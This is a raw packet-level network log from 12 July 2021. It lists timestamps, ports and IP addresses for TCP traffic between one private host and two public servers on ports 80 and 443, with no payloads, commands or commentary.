Jul 12, 2021 10:29:51.739373922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739396095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739404917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739427090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739438057 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739461899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739483118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739515066 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739553928 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739636898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739661932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739684105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739706039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739729881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739736080 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739758968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739767075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739790916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739810944 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739826918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739849091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739872932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739882946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739907980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739921093 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739942074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739965916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739990950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739998102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740024090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740046978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740057945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740080118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740101099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740112066 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740138054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740165949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740174055 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740200043 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740221977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740233898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740308046 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740417004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740442991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740468025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740489960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740511894 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740524054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740533113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740556002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740577936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740597963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740609884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740636110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740655899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740668058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740690947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740710974 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740724087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740746975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740767002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740787029 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740794897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740820885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740828037 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740849018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740868092 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740879059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740900040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740926981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740936995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740959883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.740981102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.740993023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741017103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741038084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741049051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741072893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741092920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741116047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741163969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741223097 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:51.741419077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741442919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741466045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741487980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741499901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741523027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741545916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741568089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741579056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741617918 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741669893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741692066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741741896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741767883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741790056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741832972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741839886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741867065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741889954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741918087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741924047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741939068 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.741959095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.741980076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742002010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742014885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742039919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742063046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742082119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742090940 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742111921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742139101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742166996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742194891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742316008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742443085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742465019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742485046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742496014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742523909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742544889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742574930 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742650032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742674112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742692947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742717028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742727995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742749929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742769957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742778063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742799997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742821932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742835999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742851973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742877960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742885113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742906094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742918015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.742938995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742960930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.742980957 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743016958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743040085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743058920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743074894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743132114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743165016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743185997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743196964 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743218899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743232012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743261099 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743275881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743298054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743319988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743345022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743351936 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743374109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743387938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743411064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743434906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743458033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743475914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743500948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743506908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743520021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743535995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743545055 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743566990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743591070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743608952 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743624926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743647099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743669987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743689060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743704081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743726015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743738890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743761063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743781090 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743792057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743813992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743834019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743853092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.743861914 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.743900061 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.744048119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744090080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744142056 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.744165897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744189978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744211912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744236946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.744267941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.744285107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744308949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744329929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744354963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744362116 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.744385958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744394064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.744415998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744434118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.744465113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.747908115 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:51.848643064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.972953081 CEST	443	49762	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:51.976766109 CEST	443	49762	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:51.980926991 CEST	443	49762	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:51.980958939 CEST	443	49762	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:51.991750002 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:52.005261898 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:52.005300999 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:52.115268946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:52.117101908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:52.248676062 CEST	443	49762	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:52.251709938 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:52.621397972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:52.621485949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:52.974103928 CEST	49763	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:53.204410076 CEST	443	49763	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:53.204526901 CEST	49763	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:53.216183901 CEST	49763	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:53.445394039 CEST	443	49763	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:53.445818901 CEST	443	49763	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:53.445884943 CEST	49763	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:53.503793955 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.504825115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.525825977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.525866032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.525969028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531234980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531275988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531301022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531325102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531349897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531374931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531382084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531398058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531423092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531430960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531445980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531462908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531472921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531497955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531517982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531519890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531543970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531554937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531568050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531590939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531605959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531614065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531636953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531651020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531662941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531687975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531699896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531711102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531734943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531749010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531759024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531783104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531795025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531806946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531831026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531843901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531856060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531879902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531889915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531903982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531928062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531939030 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.531951904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531976938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.531989098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532001972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532025099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532043934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532049894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532073975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532085896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532097101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532121897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532130957 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532149076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532171965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532195091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532218933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532227039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532244921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532269955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532294035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532316923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532318115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532340050 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532346010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532370090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532393932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532416105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532418013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532442093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532454967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532466888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532479048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532490015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532516003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532541037 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532569885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532594919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532612085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532618046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532641888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532668114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532691002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532692909 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532713890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532733917 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532757998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532759905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532782078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532804966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532828093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532839060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532851934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532866955 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532877922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532902956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532926083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532927036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.532952070 CEST	80	49755	47.254.186.176	192.168.2.3
